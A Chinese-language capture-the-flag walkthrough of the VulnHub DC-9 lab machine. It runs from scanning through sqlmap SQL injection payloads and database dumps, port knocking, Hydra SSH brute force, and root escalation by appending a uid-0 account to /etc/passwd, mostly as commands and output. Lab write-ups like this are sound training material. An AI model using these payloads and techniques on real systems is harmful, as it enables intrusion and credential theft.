DC9靶機下載地址
https://www.vulnhub.com/entry/dc-9,412/
靶機描述
Description
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
Technical Information
DC-9 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.
DC-9 has been tested successfully on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.
Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
Credits
A big thanks goes out to the members of @m0tl3ycr3w.
Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).
I can be contacted via Twitter - @DCAU7
實驗環(huán)境
- 攻擊vps(kali linux):ip_addr 172.25.0.69
- DC9靶機:mac_addr 00:0c:29:b1:3a:71
0x01 主機發(fā)現(xiàn)
通過抓包得到DC9靶機ip地址為172.25.0.71
kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
54 Captured ARP Req/Rep packets, from 4 hosts. Total size: 3240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
172.25.0.1 00:50:56:c0:00:08 19 1140 VMware, Inc.
172.25.0.2 00:50:56:f8:42:a0 17 1020 VMware, Inc.
172.25.0.71 00:0c:29:b1:3a:71 17 1020 VMware, Inc.
172.25.0.100 00:50:56:e5:b3:42 1 60 VMware, Inc.
0x02 端口掃描
目標(biāo)靶機DC9開啟了web服務(wù)和ssh服務(wù)朗兵。
kali@kali:~$ sudo nmap -A -p- 172.25.0.71
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 19:21 EST
Nmap scan report for 172.25.0.71
Host is up (0.00080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:B1:3A:71 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 172.25.0.71
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.54 seconds
0x03 漏洞發(fā)現(xiàn)及利用
直接web上手
發(fā)現(xiàn)search.php頁面存在數(shù)據(jù)庫交互
bp抓包看是否存在sql注入
以下是驗證過程涡尘,驗證存在!
image.png
直接上sqlmap跑
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u http://172.25.0.71/results.php --data "search=1" -D users -T UserDetails --dump
___
__H__
___ ___["]_____ ___ ___ {1.4.2.30#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:46:24 /2020-03-03/
[18:46:25] [INFO] resuming back-end DBMS 'mysql'
[18:46:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3605 FROM (SELECT(SLEEP(5)))foDI) AND 'YuPB'='YuPB
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7162767171,0x6f756a62416d4266637054726e4d7052654647774f556a4a5a5846717356785a5378545141687a43,0x716a707871),NULL,NULL,NULL,NULL,NULL-- -
---
[18:46:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:46:25] [INFO] fetching columns for table 'UserDetails' in database 'users'
[18:46:25] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
[18:46:25] [INFO] table 'users.UserDetails' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71\dump\users\UserDetails.csv'
[18:46:25] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71'
[*] ending @ 18:46:25 /2020-03-03/
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u http://172.25.0.71/results.php --data "search=1" -D Staff -T Users --dump --thread 1000
___
__H__
___ ___["]_____ ___ ___ {1.4.2.30#dev}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:50:02 /2020-03-03/
[18:50:03] [INFO] resuming back-end DBMS 'mysql'
[18:50:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3605 FROM (SELECT(SLEEP(5)))foDI) AND 'YuPB'='YuPB
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7162767171,0x6f756a62416d4266637054726e4d7052654647774f556a4a5a5846717356785a5378545141687a43,0x716a707871),NULL,NULL,NULL,NULL,NULL-- -
---
[18:50:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:50:03] [INFO] fetching columns for table 'Users' in database 'Staff'
[18:50:03] [INFO] fetching entries for table 'Users' in database 'Staff'
[18:50:03] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[18:50:04] [INFO] writing hashes to a temporary file 'C:\Users\Administrator\AppData\Local\Temp\sqlmapo88z6e7110392\sqlmaphashes-cjlb6jp7.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[18:50:05] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\Administrator\Desktop\burp\sqlmap-master\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[18:50:06] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[18:50:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[18:50:08] [INFO] starting 4 processes
[18:50:40] [INFO] using suffix '1'
[18:51:12] [INFO] cracked password 'transorbital1' for user 'admin'
Database: Staff
Table: Users
[1 entry]
+--------+--------------------------------------------------+----------+
| UserID | Password | Username |
+--------+--------------------------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin |
+--------+--------------------------------------------------+----------+
[18:51:12] [INFO] table 'Staff.Users' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71\dump\Staff\Users.csv'
[18:51:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71'
[*] ending @ 18:51:12 /2020-03-03/
利用sql注入漏洞爆出后臺管理賬密
admin:transorbital1
使用admin賬號登陸后臺
發(fā)現(xiàn)在search.php和addrecord.php頁面存在本地文件包含漏洞(由于頁底包含頁面顯示文件不存在所以猜測存在本地文件包含)
證實如下
image.png
將以上收集到的用戶和密碼信息制作成用戶字典和密碼字典用來進行接下來的ssh爆破工作
進行ssh爆破
發(fā)現(xiàn)無法爆破珠移,聯(lián)想是否存在守護進程
繼續(xù)利用文件包含漏洞發(fā)現(xiàn)存在守護進程
knockd功能介紹
簡單來說就是用來隱藏ssh登陸端口。(也就是我們之前掃描端口時發(fā)現(xiàn)22端口阻塞)只有我們按照設(shè)定的順序敲擊端口,防火墻才會打開登陸端口。再按照同樣的方式可以使防火墻關(guān)閉ssh登陸端口,如果別人不知道我們設(shè)定的端口敲擊順序,是無法登陸ssh的醉顽。我們可以下載knock來開啟遠程端口
image.png
查看配置文件信息發(fā)現(xiàn),依次推敲7469看铆,8475徽鼎,9842端口即可打開ssh服務(wù)的22端口
命令如下
nc 172.25.0.71 7469
nc 172.25.0.71 8475
nc 172.25.0.71 9842
接下來使用hydra來進行密碼爆破
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-03 06:17:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 153 login tries (l:9/p:17), ~10 tries per task
[DATA] attacking ssh://172.25.0.71:22/
[22][ssh] host: 172.25.0.71 login: chandlerb password: UrAG0D!
[22][ssh] host: 172.25.0.71 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-03 06:18:18
爆破得到dc9可登錄ssh服務(wù)賬號密碼如下
chandlerb:UrAG0D!
janitor:Ilovepeepee
通過ssh登陸dc9進行信息收集
在janitor家目錄下發(fā)現(xiàn)有用的密碼信息
janitor@dc-9:~$ ls -alh
total 16K
drwx------ 4 janitor janitor 4.0K Mar 3 21:18 .
drwxr-xr-x 19 root root 4.0K Dec 29 20:02 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 21:48 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4.0K Mar 3 21:18 .gnupg
drwx------ 2 janitor janitor 4.0K Dec 29 17:10 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$
把收集到的密碼信息放入密碼字典繼續(xù)進行密碼爆破
kali@kali:~$ hydra -L user.dic -P password.dic 172.25.0.71 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-03 06:25:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 230 login tries (l:10/p:23), ~15 tries per task
[DATA] attacking ssh://172.25.0.71:22/
[22][ssh] host: 172.25.0.71 login: fredf password: B4-Tru3-001
[22][ssh] host: 172.25.0.71 login: chandlerb password: UrAG0D!
[22][ssh] host: 172.25.0.71 login: janitor password: Ilovepeepee
[22][ssh] host: 172.25.0.71 login: joeyt password: Passw0rd
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-03 06:26:14
又爆出兩個用戶的密碼
login: fredf password: B4-Tru3-001
login: chandlerb password: UrAG0D!
login: janitor password: Ilovepeepee
login: joeyt password: Passw0rd
0x04 sudo 提權(quán)
使用fredf通過ssh服務(wù)登陸dc9
查看fredf用戶能以root權(quán)限執(zhí)行的一個py編譯后的腳本
運行看看,提示使用python test.py 加參數(shù) 運行弹惦!
kali@kali:~$ ssh fredf@172.25.0.71
fredf@172.25.0.71's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 3 21:27:19 2020 from 172.25.0.69
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:/opt/devstuff/dist/test$ ./test
Usage: python test.py read append
通過find命令找到py源碼否淤,并查看該python源碼
簡單的解釋一下這段代碼作用,打開一個文件棠隐,把該文件的內(nèi)容寫入另一個文件石抡。
fredf@dc-9:/opt/devstuff/dist/test$ find / -name "test.py" 2>/dev/null
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py
fredf@dc-9:/opt/devstuff/dist/test$ cat /opt/devstuff/test.py
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r")
output = (f.read())
f = open(sys.argv[2], "a")
f.write(output)
f.close()
由此我們有一個思路,手寫一個用戶信息助泽,寫入/etc/passwd文件啰扛,設(shè)置uid=0,即可提權(quán)為root權(quán)限嗡贺。
以下是提權(quán)過程:
嘗試添加無密碼root賬號隐解,發(fā)現(xiàn)不成功
故而使用openssh制作密碼123456密文
openssl passwd -1 -salt whjy 123456
fredf@dc-9:/opt/devstuff$ echo zgjy::0:0:::/bin/bash >>/tmp/zgjy
fredf@dc-9:/opt/devstuff$ cd -
/opt/devstuff/dist/test
fredf@dc-9:/opt/devstuff/dist/test$ ./test /tmp/zgjy /etc/passwd
Traceback (most recent call last):
File "test.py", line 13, in <module>
PermissionError: [Errno 13] Permission denied: '/etc/passwd'
[3516] Failed to execute script test
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/zgjy /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su zgjy
su: user zgjy does not exist
fredf@dc-9:/opt/devstuff/dist/test$ sudo cat /etc/passwd
[sudo] password for fredf:
Sorry, user fredf is not allowed to execute '/usr/bin/cat /etc/passwd' as root on dc-9.
fredf@dc-9:/opt/devstuff/dist/test$ su - zgjy
su: user zgjy does not exist
fredf@dc-9:/opt/devstuff/dist/test$
fredf@dc-9:/opt/devstuff/dist/test$ echo 'whjy:$1$au$yiTIEVOOBr5S6eBjHZluV/:0:0:root:/bin/bash' >> /tmp/whjy
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/whjy /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su - whjy
Password:
su: Authentication failure
fredf@dc-9:/opt/devstuff/dist/test$ su - whjy
Password:
su: warning: cannot change directory to /bin/bash: Not a directory
# id
uid=0(root) gid=0(root) groups=0(root)
# /bin/bash
bash: /bin/bash/.bashrc: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd
bash: cd: /bin/bash: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd ~
bash: cd: /bin/bash: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd /root
root@dc-9:/root# ls
theflag.txt
root@dc-9:/root# cat thrflag.txt
cat: thrflag.txt: No such file or directory
root@dc-9:/root# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.
sudo提權(quán)成功,并且拿到flag诫睬,dc系列靶機end煞茫!
